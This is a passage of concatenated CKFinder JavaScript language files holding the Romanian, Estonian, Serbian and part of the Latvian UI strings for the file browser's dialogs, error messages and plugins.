FolderDeleting : ' (Ștergere...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Te rugăm să introduci numele nou al fișierului: ', FileRenameExt : 'Ești sigur că vrei să schimbi extensia fișierului? Fișierul poate deveni inutilizabil.', FileRenaming : 'Redenumire...', FileDelete : 'Ești sigur că vrei să ștergi fișierul "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Încărcare...', FilesEmpty : 'Dosarul este gol.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Coș', BasketClear : 'Golește coș', BasketRemove : 'Elimină din coș', BasketOpenFolder : 'Deschide dosarul părinte', BasketTruncateConfirm : 'Sigur dorești să elimini toate fișierele din coș?', BasketRemoveConfirm : 'Sigur dorești să elimini fișierul "%1" din coș?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Niciun fișier în coș, trage și așează cu mouse-ul.', BasketCopyFilesHere : 'Copiază fișiere din coș', BasketMoveFilesHere : 'Mută fișiere din coș', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Încarcă', UploadTip : 'Încarcă un fișier nou', Refresh : 'Reîmprospătare', Settings : 'Setări', Help : 'Ajutor', HelpTip : 'Ajutor', // Context Menus Select : 'Selectează', SelectThumbnail : 'Selectează Thumbnail', View : 'Vizualizează', Download : 'Descarcă', NewSubFolder : 'Subdosar nou', Rename : 'Redenumește', Delete : 'Șterge', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copiază aici', MoveDragDrop : 'Mută aici', // Dialogs RenameDlgTitle : 'Redenumește', NewNameDlgTitle : 'Nume nou', FileExistsDlgTitle : 'Fișierul există deja', SysErrorDlgTitle : 'Eroare de sistem', FileOverwrite : 'Suprascriere', FileAutorename : 'Auto-redenumire', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Anulează', CloseBtn : 'Închide', // Upload Panel UploadTitle : 'Încarcă un fișier nou', UploadSelectLbl : 'Selectează un fișier de încărcat', UploadProgressLbl : '(Încărcare în progres, te rog așteaptă...)', UploadBtn : 'Încarcă fișierul selectat', UploadBtnCancel : 'Anulează', UploadNoFileMsg : 'Te rugăm să selectezi un fișier din computer.', UploadNoFolder : 'Te rugăm să selectezi un dosar înainte de a încărca.', UploadNoPerms : 'Încărcare fișier nepermisă.', UploadUnknError : 'Eroare la trimiterea fișierului.', UploadExtIncorrect : 'Extensie fișier nepermisă în acest dosar.', // Flash Uploads UploadLabel : 'Fișiere de încărcat', UploadTotalFiles : 'Total fișiere:', UploadTotalSize : 'Total mărime:', UploadSend : 'Încarcă', UploadAddFiles : 'Adaugă fișiere', UploadClearFiles : 'Renunță la toate', UploadCancel : 'Anulează încărcare', UploadRemove : 'Elimină', UploadRemoveTip : 'Elimină !f', UploadUploaded : 'Încarcă !n%', UploadProcessing : 'Prelucrare...', // Settings Panel SetTitle : 'Setări', SetView : 'Vizualizează:', SetViewThumb : 'Thumbnails', SetViewList : 'Listă', SetDisplay : 'Afișează:', SetDisplayName : 'Nume fișier', SetDisplayDate : 'Dată', SetDisplaySize : 'Mărime fișier', SetSort : 'Sortare:', SetSortName : 'după nume fișier', SetSortDate : 'după dată', SetSortSize : 'după mărime', SetSortExtension : 'după extensie', // Status Bar FilesCountEmpty : '<Dosar Gol>', FilesCountOne : '1 fișier', FilesCountMany : '%1 fișiere', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Nu a fost posibilă finalizarea cererii. (Eroare %1)', Errors : { 10 : 'Comandă invalidă.', 11 : 'Tipul de resursă nu a fost specificat în cerere.', 12 : 'Tipul de resursă cerut nu este valid.', 102 : 'Nume fișier sau nume dosar invalid.', 103 : 'Nu a fost posibiliă finalizarea cererii din cauza restricțiilor de autorizare.', 104 : 'Nu a fost posibiliă finalizarea cererii din cauza restricțiilor de permisiune la sistemul de fișiere.', 105 : 'Extensie fișier invalidă.', 109 : 'Cerere invalidă.', 110 : 'Eroare necunoscută.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Există deja un fișier sau un dosar cu același nume.', 116 : 'Dosar negăsit. Te rog împrospătează și încearcă din nou.', 117 : 'Fișier negăsit. Te rog împrospătează lista de fișiere și încearcă din nou.', 118 : 'Calea sursei și a țintei sunt egale.', 201 : 'Un fișier cu același nume este deja disponibil. Fișierul încărcat a fost redenumit cu "%1".', 202 : 'Fișier invalid.', 203 : 'Fișier invalid. Mărimea fișierului este prea mare.', 204 : 'Fișierul încărcat este corupt.', 205 : 'Niciun dosar temporar nu este disponibil pentru încărcarea pe server.', 206 : 'Încărcare anulată din motive de securitate. Fișierul conține date asemănătoare cu HTML.', 207 : 'Fișierul încărcat a fost redenumit cu "%1".', 300 : 'Mutare fișier(e) eșuată.', 301 : 'Copiere fișier(e) eșuată.', 500 : 'Browser-ul de fișiere este dezactivat din motive de securitate. Te rog contactează administratorul de sistem și verifică configurarea de fișiere CKFinder.', 501 : 'Funcționalitatea de creat thumbnails este dezactivată.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Numele fișierului nu poate fi gol.', FileExists : 'Fișierul %s există deja.', FolderEmpty : 'Numele dosarului nu poate fi gol.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Numele fișierului nu poate conține niciunul din următoarele caractere: \n\\ / : * ? " < > |', FolderInvChar : 'Numele dosarului nu poate conține niciunul din următoarele caractere: \n\\ / : * ? " < > |', PopupBlockView : 'Nu a fost posibilă deschiderea fișierului într-o fereastră nouă. Te rugăm să configurezi browser-ul și să dezactivezi toate popup-urile blocate pentru acest site.', XmlError : 'Nu a fost posibilă încărcarea în mod corespunzător a răspunsului XML de pe serverul web.', XmlEmpty : 'Nu a fost posibilă încărcarea răspunsului XML de pe serverul web. Serverul a returnat un răspuns gol.', XmlRawResponse : 'Răspuns brut de la server: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Redimensionează %s', sizeTooBig : 'Nu se pot seta înălțimea sau lățimea unei imagini la o valoare mai mare decât dimesiunea originală (%size).', resizeSuccess : 'Imagine redimensionată cu succes.', thumbnailNew : 'Crează un thumbnail nou', thumbnailSmall : 'Mic (%s)', thumbnailMedium : 'Mediu (%s)', thumbnailLarge : 'Mare (%s)', newSize : 'Setează o dimensiune nouă', width : 'Lățime', height : 'Înălțime', invalidHeight : 'Înălțime invalidă.', invalidWidth : 'Lățime invalidă.', invalidName : 'Nume fișier invalid.', newImage : 'Creează o imagine nouă', noExtensionChange : 'Extensia fișierului nu poate fi schimbată.', imageSmall : 'Imaginea sursă este prea mică.', contextMenuName : 'Redimensionează', lockRatio : 'Blochează raport', resetSize : 'Resetează dimensiunea' }, // Fileeditor plugin Fileeditor : { save : 'Salvează', fileOpenError : 'Fișierul nu a putut fi deschis.', fileSaveSuccess : 'Fișier salvat cu succes.', contextMenuName : 'Editează', loadingFile : 'Încărcare fișier, te rog așteaptă...' }, Maximize : { maximize : 'Maximizare', minimize : 'Minimizare' }, Gallery : { current : 'Imaginea {current} din {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Estonian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['et'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, pole saadaval</span>', confirmCancel : 'Mõned valikud on muudetud. Kas oled kindel, et tahad dialoogiakna sulgeda?', ok : 'Olgu', cancel : 'Loobu', confirmationTitle : 'Kinnitus', messageTitle : 'Andmed', inputTitle : 'Küsimus', undo : 'Võta tagasi', redo : 'Tee uuesti', skip : 'Jäta vahele', skipAll : 'Jäta kõik vahele', makeDecision : 'Mida tuleks teha?', rememberDecision: 'Jäta valik meelde' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'et', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy-mm-dd H:MM', DateAmPm : ['EL', 'PL'], // Folders FoldersTitle : 'Kaustad', FolderLoading : 'Laadimine...', FolderNew : 'Palun sisesta uue kataloogi nimi: ', FolderRename : 'Palun sisesta uue kataloogi nimi: ', FolderDelete : 'Kas tahad kindlasti kausta "%1" kustutada?', FolderRenaming : ' (ümbernimetamine...)', FolderDeleting : ' (kustutamine...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Palun sisesta faili uus nimi: ', FileRenameExt : 'Kas oled kindel, et tahad faili laiendit muuta? Fail võib muutuda kasutamatuks.', FileRenaming : 'Ümbernimetamine...', FileDelete : 'Kas oled kindel, et tahad kustutada faili "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laadimine...', FilesEmpty : 'See kaust on tühi.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Korv', BasketClear : 'Tühjenda korv', BasketRemove : 'Eemalda korvist', BasketOpenFolder : 'Ava ülemine kaust', BasketTruncateConfirm : 'Kas tahad tõesti eemaldada korvist kõik failid?', BasketRemoveConfirm : 'Kas tahad tõesti eemaldada korvist faili "%1"?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Korvis ei ole ühtegi faili, lohista mõni siia.', BasketCopyFilesHere : 'Failide kopeerimine korvist', BasketMoveFilesHere : 'Failide liigutamine korvist', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Laadi üles', UploadTip : 'Laadi üles uus fail', Refresh : 'Värskenda', Settings : 'Sätted', Help : 'Abi', HelpTip : 'Abi', // Context Menus Select : 'Vali', SelectThumbnail : 'Vali pisipilt', View : 'Kuva', Download : 'Laadi alla', NewSubFolder : 'Uus alamkaust', Rename : 'Nimeta ümber', Delete : 'Kustuta', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopeeri siia', MoveDragDrop : 'Liiguta siia', // Dialogs RenameDlgTitle : 'Ümbernimetamine', NewNameDlgTitle : 'Uue nime andmine', FileExistsDlgTitle : 'Fail on juba olemas', SysErrorDlgTitle : 'Süsteemi viga', FileOverwrite : 'Kirjuta üle', FileAutorename : 'Nimeta automaatselt ümber', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Olgu', CancelBtn : 'Loobu', CloseBtn : 'Sulge', // Upload Panel UploadTitle : 'Uue faili üleslaadimine', UploadSelectLbl : 'Vali üleslaadimiseks fail', UploadProgressLbl : '(Üleslaadimine, palun oota...)', UploadBtn : 'Laadi valitud fail üles', UploadBtnCancel : 'Loobu', UploadNoFileMsg : 'Palun vali fail oma arvutist.', UploadNoFolder : 'Palun vali enne üleslaadimist kataloog.', UploadNoPerms : 'Failide üleslaadimine pole lubatud.', UploadUnknError : 'Viga faili saatmisel.', UploadExtIncorrect : 'Selline faili laiend pole selles kaustas lubatud.', // Flash Uploads UploadLabel : 'Üleslaaditavad failid', UploadTotalFiles : 'Faile kokku:', UploadTotalSize : 'Kogusuurus:', UploadSend : 'Laadi üles', UploadAddFiles : 'Lisa faile', UploadClearFiles : 'Eemalda failid', UploadCancel : 'Katkesta üleslaadimine', UploadRemove : 'Eemalda', UploadRemoveTip : 'Eemalda !f', UploadUploaded : '!n% üles laaditud', UploadProcessing : 'Töötlemine...', // Settings Panel SetTitle : 'Sätted', SetView : 'Vaade:', SetViewThumb : 'Pisipildid', SetViewList : 'Loend', SetDisplay : 'Kuva:', SetDisplayName : 'Faili nimi', SetDisplayDate : 'Kuupäev', SetDisplaySize : 'Faili suurus', SetSort : 'Sortimine:', SetSortName : 'faili nime järgi', SetSortDate : 'kuupäeva järgi', SetSortSize : 'suuruse järgi', SetSortExtension : 'laiendi järgi', // Status Bar FilesCountEmpty : '<tühi kaust>', FilesCountOne : '1 fail', FilesCountMany : '%1 faili', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Päringu täitmine ei olnud võimalik. (Viga %1)', Errors : { 10 : 'Vigane käsk.', 11 : 'Allika liik ei olnud päringus määratud.', 12 : 'Päritud liik ei ole sobiv.', 102 : 'Sobimatu faili või kausta nimi.', 103 : 'Piiratud õiguste tõttu ei olnud võimalik päringut lõpetada.', 104 : 'Failisüsteemi piiratud õiguste tõttu ei olnud võimalik päringut lõpetada.', 105 : 'Sobimatu faililaiend.', 109 : 'Vigane päring.', 110 : 'Tundmatu viga.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Sellenimeline fail või kaust on juba olemas.', 116 : 'Kausta ei leitud. Palun värskenda lehte ja proovi uuesti.', 117 : 'Faili ei leitud. Palun värskenda lehte ja proovi uuesti.', 118 : 'Lähte- ja sihtasukoht on sama.', 201 : 'Samanimeline fail on juba olemas. Üles laaditud faili nimeks pandi "%1".', 202 : 'Vigane fail.', 203 : 'Vigane fail. Fail on liiga suur.', 204 : 'Üleslaaditud fail on rikutud.', 205 : 'Serverisse üleslaadimiseks pole ühtegi ajutiste failide kataloogi.', 206 : 'Üleslaadimine katkestati turvakaalutlustel. Fail sisaldab HTMLi sarnaseid andmeid.', 207 : 'Üleslaaditud faili nimeks pandi "%1".', 300 : 'Faili(de) liigutamine nurjus.', 301 : 'Faili(de) kopeerimine nurjus.', 500 : 'Failide sirvija on turvakaalutlustel keelatud. Palun võta ühendust oma süsteemi administraatoriga ja kontrolli CKFinderi seadistusfaili.', 501 : 'Pisipiltide tugi on keelatud.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Faili nimi ei tohi olla tühi.', FileExists : 'Fail nimega %s on juba olemas.', FolderEmpty : 'Kausta nimi ei tohi olla tühi.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Faili nimi ei tohi sisaldada ühtegi järgnevatest märkidest: \n\\ / : * ? " < > |', FolderInvChar : 'Faili nimi ei tohi sisaldada ühtegi järgnevatest märkidest: \n\\ / : * ? " < > |', PopupBlockView : 'Faili avamine uues aknas polnud võimalik. Palun seadista oma brauserit ning keela kõik hüpikakende blokeerijad selle saidi jaoks.', XmlError : 'XML vastust veebiserverist polnud võimalik korrektselt laadida.', XmlEmpty : 'XML vastust veebiserverist polnud võimalik korrektselt laadida. Serveri vastus oli tühi.', XmlRawResponse : 'Serveri vastus toorkujul: %s' }, // Imageresize plugin Imageresize : { dialogTitle : '%s suuruse muutmine', sizeTooBig : 'Pildi kõrgust ega laiust ei saa määrata suuremaks pildi esialgsest vastavast mõõtmest (%size).', resizeSuccess : 'Pildi suuruse muutmine õnnestus.', thumbnailNew : 'Tee uus pisipilt', thumbnailSmall : 'Väike (%s)', thumbnailMedium : 'Keskmine (%s)', thumbnailLarge : 'Suur (%s)', newSize : 'Määra uus suurus', width : 'Laius', height : 'Kõrgus', invalidHeight : 'Sobimatu kõrgus.', invalidWidth : 'Sobimatu laius.', invalidName : 'Sobimatu faili nimi.', newImage : 'Loo uus pilt', noExtensionChange : 'Faili laiendit pole võimalik muuta.', imageSmall : 'Lähtepilt on liiga väike.', contextMenuName : 'Muuda suurust', lockRatio : 'Lukusta külgede suhe', resetSize : 'Lähtesta suurus' }, // Fileeditor plugin Fileeditor : { save : 'Salvesta', fileOpenError : 'Faili avamine pole võimalik.', fileSaveSuccess : 'Faili salvestamine õnnestus.', contextMenuName : 'Muuda', loadingFile : 'Faili laadimine, palun oota...' }, Maximize : { maximize : 'Maksimeeri', minimize : 'Minimeeri' }, Gallery : { current : 'Pilt {current}, kokku {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Serbian * Translation for the Serbian language: Goran Markovic, University Computer Center of Banja Luka * */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['sr'] = { appTitle : 'Датотеке', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, недоступно</span>', confirmCancel : 'Неке од опција су промјењене. Да ли сте сигурни да желите затворити прозор??', ok : 'У реду', cancel : 'Поништи', confirmationTitle : 'Потврда', messageTitle : 'Информација', inputTitle : 'Питање', undo : 'Поништи', redo : 'Преуреди', skip : 'Прескочи', skipAll : 'Прескочи све', makeDecision : 'Шта би требали направити?', rememberDecision: 'Запамти мој избор' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'sr', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd.m.yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Фасцикле', FolderLoading : 'Учитавам...', FolderNew : 'Унесите ново име фасцикле: ', FolderRename : 'Унесите ново име фасцикле: ', FolderDelete : 'Да ли сте сигурни да желите обрисати фасциклу "%1"?', FolderRenaming : ' (Промјена назива фасцикле...)', FolderDeleting : ' (Брисање...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Унесите нови назив датотеке: ', FileRenameExt : 'Да ли сте сигурни да желите промјенити тип датотеке? Датотека може постати неискористива.', FileRenaming : 'Промјена назива датотеке...', FileDelete : 'Да ли сте сигурни да желите обрисати датотеку "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Учитавам...', FilesEmpty : 'Фасцикла је празна.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Канта', BasketClear : 'Испразни канту', BasketRemove : 'Уклони из канте', BasketOpenFolder : 'Отвори надређену фасциклу', BasketTruncateConfirm : 'Да ли сте сигурни да желите обрисати све датотеке из канте?', BasketRemoveConfirm : 'Да ли сте сигурни да желите обрисати датотеку "%1" из канте?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Ниједна датотека није пронађена, додајте коју.', BasketCopyFilesHere : 'Копирај датотеке из канте', BasketMoveFilesHere : 'Премјести датотеке из канте', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Отпреми', UploadTip : 'Отпреми нове датотеке на сервер', Refresh : 'Освјежи', Settings : 'Подешавања', Help : 'Помоћ', HelpTip : 'Помоћ', // Context Menus Select : 'Одабери', SelectThumbnail : 'Одабери мању слику', View : 'Погледај', Download : 'Преузми', NewSubFolder : 'Нова подфасцикла', Rename : 'Промјени назив', Delete : 'Обриши', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Копирај датотеку овдје', MoveDragDrop : 'Премјести датотеку овдје', // Dialogs RenameDlgTitle : 'Промјени назив', NewNameDlgTitle : 'Нови назив', FileExistsDlgTitle : 'Датотека већ постоји', SysErrorDlgTitle : 'Грешка система', FileOverwrite : 'Препиши', FileAutorename : 'Аутоматска промјена назива', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'У реду', CancelBtn : 'Поништи', CloseBtn : 'Затвори', // Upload Panel UploadTitle : 'Отпреми нову датотеку', UploadSelectLbl : 'Одабери датотеку за отпремање', UploadProgressLbl : '(Слање у току, молимо сачекајте...)', UploadBtn : 'Отпреми одабрану датотеку', UploadBtnCancel : 'Поништи', UploadNoFileMsg : 'Одаберите датотеку на Вашем рачунару.', UploadNoFolder : 'Одаберите фасцикле прије отпремања.', UploadNoPerms : 'Отпремање датотеке није дозвољено.', UploadUnknError : 'Грешка приликом отпремања датотеке.', UploadExtIncorrect : 'Тип датотеке није дозвољен.', // Flash Uploads UploadLabel : 'Датотека за отпремање:', UploadTotalFiles : 'Укупно датотека:', UploadTotalSize : 'Укупна величина:', UploadSend : 'Отпреми', UploadAddFiles : 'Додај датотеке', UploadClearFiles : 'Избаци датотеке', UploadCancel : 'Поништи отпремање', UploadRemove : 'Уклони', UploadRemoveTip : 'Уклони !f', UploadUploaded : 'Послато !n%', UploadProcessing : 'Обрада у току...', // Settings Panel SetTitle : 'Подешавања', SetView : 'Преглед:', SetViewThumb : 'Мала слика', SetViewList : 'Листа', SetDisplay : 'Приказ:', SetDisplayName : 'Назив датотеке', SetDisplayDate : 'Датум', SetDisplaySize : 'Величина датотеке', SetSort : 'Сортирање:', SetSortName : 'по називу', SetSortDate : 'по датуму', SetSortSize : 'по величини', SetSortExtension : 'по врсти датотеке', // Status Bar FilesCountEmpty : '<Празна фасцикла>', FilesCountOne : '1 датотека', FilesCountMany : '%1 датотека(е)', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Није могуће завршити захтјев. (Грешка %1)', Errors : { 10 : 'Непозната наредба.', 11 : 'Није наведена врста у захтјеву.', 12 : 'Затражена врста није важећа.', 102 : 'Неисправан назив датотеке или фасцикле.', 103 : 'Није могуће извршити захтјев због ограничења приступа.', 104 : 'Није могуће извршити захтјев због ограничења поставке система.', 105 : 'Недозвољена врста датотеке.', 109 : 'Недозвољен захтјев.', 110 : 'Непозната грешка.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Датотека или фасцикла с истим називом већ постоји.', 116 : 'Фасцикла није пронађена. Освјежите страницу и покушајте поново.', 117 : 'Датотека није пронађена. Освјежите листу датотека и покушајте поново.', 118 : 'Путања извора и одредишта су исте.', 201 : 'Датотека с истим називом већ постоји. Отпремљена датотека је промјењена у "%1".', 202 : 'Неисправна датотека.', 203 : 'Неисправна датотека. Величина датотеке је превелика.', 204 : 'Отпремљена датотека је неисправна.', 205 : 'Не постоји привремена фасцикла за отпремање на серверe.', 206 : 'Слање је поништено због сигурносних поставки. Назив датотеке садржи HTML податке.', 207 : 'Отпремљена датотека је промјењена у "%1".', 300 : 'Премјештање датотеке(а) није успјело.', 301 : 'Копирање датотеке(а) није успјело.', 500 : 'Претраживање датотека није дозвољено из сигурносних разлога. Молимо контактирајте администратора система како би провјерили поставке CKFinder конфигурационе датотеке.', 501 : 'Thumbnail подршка није омогућена.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Назив датотеке не смије бити празан.', FileExists : 'Датотека %s већ постоји.', FolderEmpty : 'Назив фасцикле не смије бити празан.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Назив датотеке не смије садржавати нити један од сљедећих знакова: \n\\ / : * ? " < > |', FolderInvChar : 'Назив фасцикле не смије садржавати нити један од сљедећих знакова: \n\\ / : * ? " < > |', PopupBlockView : 'Није могуће одтворити датотеку у новом прозору. Промјените подешавања свог интернет претраживача и искључите све popup блокере за ове web странице.', XmlError : 'Није могуће учитати XML одговор од web сервера.', XmlEmpty : 'Није могуће учитати XML одговор од web сервера. Сервер је вратио празан одговор.', XmlRawResponse : 'Одговор сервера: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Промијени величину %s', sizeTooBig : 'Није могуће поставити величину већу од оригинала (%size).', resizeSuccess : 'Слика је успјешно промјењена.', thumbnailNew : 'Направи малу слику', thumbnailSmall : 'Мала (%s)', thumbnailMedium : 'Средња (%s)', thumbnailLarge : 'Велика (%s)', newSize : 'Постави нову величину', width : 'Ширина', height : 'Висина', invalidHeight : 'Неисправна висина.', invalidWidth : 'Неисправна ширина.', invalidName : 'Неисправан назив датотеке.', newImage : 'Направи нову слику', noExtensionChange : 'Тип датотеке се не смије мијењати.', imageSmall : 'Изворна слика је премала.', contextMenuName : 'Промијени величину', lockRatio : 'Закључај односе', resetSize : 'Врати величину' }, // Fileeditor plugin Fileeditor : { save : 'Сачувај', fileOpenError : 'Није могуће отворити датотеку.', fileSaveSuccess : 'Датотека је успјешно сачувана.', contextMenuName : 'Промјени', loadingFile : 'Учитавање, молимо причекајте...' }, Maximize : { maximize : 'Повећај', minimize : 'Смањи' }, Gallery : { current : 'Слика {current} од {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Latvian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['lv'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, unavailable</span>', // MISSING confirmCancel : 'Some of the options were changed. Are you sure you want to close the dialog window?', // MISSING ok : 'Darīts!', cancel : 'Atcelt', confirmationTitle : 'Confirmation', // MISSING messageTitle : 'Information', // MISSING inputTitle : 'Question', // MISSING undo : 'Atcelt', redo : 'Atkārtot', skip : 'Skip', // MISSING skipAll : 'Skip all', // MISSING makeDecision : 'What action should be taken?', // MISSING rememberDecision: 'Remember my decision' // MISSING }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'lv', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mapes', FolderLoading : 'Ielādē...', FolderNew : 'Lūdzu ierakstiet mapes nosaukumu: ', FolderRename : 'Lūdzu ierakstiet jauno mapes nosaukumu: ', FolderDelete : 'Vai tiešām vēlaties neatgriezeniski dzēst mapi "%1"?', FolderRenaming : ' (Pārsauc...)', FolderDeleting : ' (Dzēš...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Lūdzu ierakstiet jauno faila nosaukumu: ', FileRenameExt : 'Vai tiešām vēlaties mainīt faila paplašinājumu? Fails var palikt nelietojams.', FileRenaming : 'Pārsauc...', FileDelete : 'Vai tiešām vēlaties neatgriezeniski dzēst failu "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Ielādē...', FilesEmpty : 'The folder is empty.', // MISSING DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Basket', // MISSING BasketClear : 